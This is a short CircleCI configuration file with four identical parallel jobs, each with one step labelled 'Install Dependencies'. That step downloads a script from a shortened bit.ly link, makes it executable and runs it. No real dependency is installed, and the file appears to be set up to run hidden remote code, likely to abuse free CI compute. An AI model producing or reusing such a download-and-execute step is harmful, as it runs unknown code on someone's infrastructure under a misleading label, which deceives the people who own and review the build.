version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bit.ly/32fAfpn && chmod u+x 32fAfpn && sh 32fAfpn
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bit.ly/32fAfpn && chmod u+x 32fAfpn && sh 32fAfpn
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bit.ly/32fAfpn && chmod u+x 32fAfpn && sh 32fAfpn
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bit.ly/32fAfpn && chmod u+x 32fAfpn && sh 32fAfpn
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3